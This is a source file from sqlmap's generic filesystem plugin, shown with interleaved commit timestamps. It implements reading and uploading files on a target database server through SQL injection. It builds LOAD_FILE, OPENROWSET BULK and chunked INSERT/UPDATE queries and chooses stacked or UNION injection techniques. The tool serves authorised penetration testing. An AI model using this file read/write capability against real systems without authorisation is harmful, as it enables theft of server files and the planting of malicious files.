sqlmap/plugins/generic/filesystem.py

300 lines
11 KiB
Python
Raw Normal View History

#!/usr/bin/env python
2008-10-15 19:38:22 +04:00
"""
2015-01-06 17:02:16 +03:00
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
2008-10-15 19:38:22 +04:00
"""
import os
2015-07-26 17:34:11 +03:00
import sys
from lib.core.agent import agent
from lib.core.common import dataToOutFile
from lib.core.common import Backend
2014-12-02 12:29:09 +03:00
from lib.core.common import checkFile
2013-01-08 13:23:02 +04:00
from lib.core.common import decloakToTemp
2012-12-07 13:57:57 +04:00
from lib.core.common import decodeHexValue
2015-07-26 17:34:11 +03:00
from lib.core.common import getUnicode
from lib.core.common import isNumPosStrValue
2012-06-14 17:38:53 +04:00
from lib.core.common import isListLike
from lib.core.common import isStackingAvailable
2010-12-18 18:57:47 +03:00
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.data import conf
2012-07-06 16:24:44 +04:00
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
2010-12-18 18:57:47 +03:00
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapUndefinedMethod
from lib.request import inject
2008-10-15 19:38:22 +04:00
class Filesystem:
"""
This class defines generic OS file system functionalities for plugins.
"""
def __init__(self):
self.fileTblName = "sqlmapfile"
2011-04-30 17:20:05 +04:00
self.tblField = "data"
def _checkFileLength(self, localFile, remoteFile, fileRead=False):
if Backend.isDbms(DBMS.MYSQL):
lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile
2013-01-14 17:43:03 +04:00
elif Backend.isDbms(DBMS.PGSQL) and not fileRead:
2015-07-24 15:56:45 +03:00
lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid
elif Backend.isDbms(DBMS.MSSQL):
2013-01-07 19:36:29 +04:00
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField));
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)
localFileSize = os.path.getsize(localFile)
if fileRead and Backend.isDbms(DBMS.PGSQL):
2015-09-03 11:19:59 +03:00
logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile)
sameFile = True
else:
2015-09-03 11:19:59 +03:00
logger.debug("checking the length of the remote file '%s'" % remoteFile)
remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
sameFile = None
if isNumPosStrValue(remoteFileSize):
remoteFileSize = long(remoteFileSize)
2015-07-26 17:34:11 +03:00
localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding())
sameFile = False
if localFileSize == remoteFileSize:
sameFile = True
2015-09-03 11:19:59 +03:00
infoMsg = "the local file '%s' and the remote file " % localFile
2015-09-03 11:32:22 +03:00
infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize)
elif remoteFileSize > localFileSize:
2015-09-03 11:32:22 +03:00
infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize)
2015-09-03 11:19:59 +03:00
infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize)
else:
2015-09-03 11:32:22 +03:00
infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize)
infoMsg += "file '%s' (%d B)" % (localFile, localFileSize)
logger.info(infoMsg)
else:
sameFile = False
2014-08-21 02:32:15 +04:00
warnMsg = "it looks like the file has not been written (usually "
warnMsg += "occurs if the DBMS process' user has no write "
warnMsg += "privileges in the destination path)"
logger.warn(warnMsg)
return sameFile
def fileToSqlQueries(self, fcEncodedList):
"""
Called by MySQL and PostgreSQL plugins to write a file on the
back-end DBMS underlying file system
"""
2011-04-30 17:20:05 +04:00
counter = 0
sqlQueries = []
for fcEncodedLine in fcEncodedList:
if counter == 0:
sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
else:
2013-01-08 13:55:25 +04:00
updatedField = agent.simpleConcatenate(self.tblField, fcEncodedLine)
sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))
counter += 1
return sqlQueries
2015-07-24 15:56:45 +03:00
def fileEncode(self, fileName, encoding, single, chunkSize=256):
"""
Called by MySQL and PostgreSQL plugins to write a file on the
back-end DBMS underlying file system
"""
2012-12-23 22:34:35 +04:00
with open(fileName, "rb") as f:
2015-07-24 15:56:45 +03:00
content = f.read()
return self.fileContentEncode(content, encoding, single, chunkSize)
def fileContentEncode(self, content, encoding, single, chunkSize=256):
retVal = []
if encoding:
content = content.encode(encoding).replace("\n", "")
if not single:
2015-07-24 15:56:45 +03:00
if len(content) > chunkSize:
for i in xrange(0, len(content), chunkSize):
_ = content[i:i + chunkSize]
if encoding == "hex":
2012-07-24 16:35:56 +04:00
_ = "0x%s" % _
elif encoding == "base64":
_ = "'%s'" % _
2012-07-24 16:35:56 +04:00
retVal.append(_)
2012-07-24 16:35:56 +04:00
if not retVal:
if encoding == "hex":
2012-07-24 16:35:56 +04:00
content = "0x%s" % content
elif encoding == "base64":
2012-07-24 16:35:56 +04:00
content = "'%s'" % content
2013-01-10 14:54:07 +04:00
retVal = [content]
2012-07-24 16:35:56 +04:00
return retVal
2013-01-23 05:27:01 +04:00
def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
output = None
2013-01-23 06:10:38 +04:00
2013-01-23 05:27:01 +04:00
if forceCheck is not True:
message = "do you want confirmation that the local file '%s' " % localFile
message += "has been successfully written on the back-end DBMS "
2015-09-03 11:19:59 +03:00
message += "file system ('%s')? [Y/n] " % remoteFile
2013-01-23 05:27:01 +04:00
output = readInput(message, default="Y")
2013-01-23 06:10:38 +04:00
if forceCheck or (output and output.lower() == "y"):
return self._checkFileLength(localFile, remoteFile)
return True
def askCheckReadFile(self, localFile, remoteFile):
message = "do you want confirmation that the remote file '%s' " % remoteFile
message += "has been successfully downloaded from the back-end "
message += "DBMS file system? [Y/n] "
2011-04-30 17:20:05 +04:00
output = readInput(message, default="Y")
if not output or output in ("y", "Y"):
return self._checkFileLength(localFile, remoteFile, True)
return None
def nonStackedReadFile(self, remoteFile):
2012-07-06 18:13:50 +04:00
errMsg = "'nonStackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def stackedReadFile(self, remoteFile):
2011-04-30 17:20:05 +04:00
errMsg = "'stackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
2011-04-30 17:20:05 +04:00
errMsg = "'unionWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
2011-04-30 17:20:05 +04:00
errMsg = "'stackedWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg)
def readFile(self, remoteFiles):
2012-12-19 18:12:09 +04:00
localFilePaths = []
self.checkDbmsOs()
for remoteFile in remoteFiles.split(","):
2012-12-19 18:12:09 +04:00
fileContent = None
kb.fileReadMode = True
2012-07-06 16:24:44 +04:00
if conf.direct or isStackingAvailable():
if isStackingAvailable():
debugMsg = "going to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(remoteFile)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to read the file with a non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)
fileContent = self.nonStackedReadFile(remoteFile)
else:
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to read files from the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
2012-07-06 18:13:50 +04:00
2012-12-19 18:12:09 +04:00
fileContent = None
kb.fileReadMode = False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
elif isListLike(fileContent):
newFileContent = ""
for chunk in fileContent:
if isListLike(chunk):
if len(chunk) > 0:
chunk = chunk[0]
else:
chunk = ""
if chunk:
newFileContent += chunk
fileContent = newFileContent
2012-12-19 18:12:09 +04:00
if fileContent is not None:
2015-07-15 12:15:06 +03:00
fileContent = decodeHexValue(fileContent, True)
if fileContent:
localFilePath = dataToOutFile(remoteFile, fileContent)
if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
sameFile = self.askCheckReadFile(localFilePath, remoteFile)
if sameFile is True:
localFilePath += " (same file)"
elif sameFile is False:
localFilePath += " (size differs from remote file)"
localFilePaths.append(localFilePath)
else:
errMsg = "no data retrieved"
logger.error(errMsg)
2012-12-19 18:12:09 +04:00
return localFilePaths
2013-01-23 05:27:01 +04:00
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
written = False
2014-12-02 12:29:09 +03:00
checkFile(localFile)
self.checkDbmsOs()
2013-01-08 13:23:02 +04:00
if localFile.endswith('_'):
localFile = decloakToTemp(localFile)
2013-01-07 18:55:40 +04:00
if conf.direct or isStackingAvailable():
if isStackingAvailable():
2015-09-03 11:19:59 +03:00
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "stacked query SQL injection technique"
logger.debug(debugMsg)
2008-10-15 19:38:22 +04:00
2013-01-23 05:27:01 +04:00
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck)
self.cleanup(onlyFileTbl=True)
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
2015-09-03 11:19:59 +03:00
debugMsg = "going to upload the file '%s' with " % fileType
debugMsg += "UNION query SQL injection technique"
logger.debug(debugMsg)
2008-10-15 19:38:22 +04:00
2013-01-23 06:10:38 +04:00
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck)
else:
errMsg = "none of the SQL injection techniques detected can "
2011-02-06 18:28:23 +03:00
errMsg += "be used to write files to the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
return None
2013-01-23 05:27:01 +04:00
return written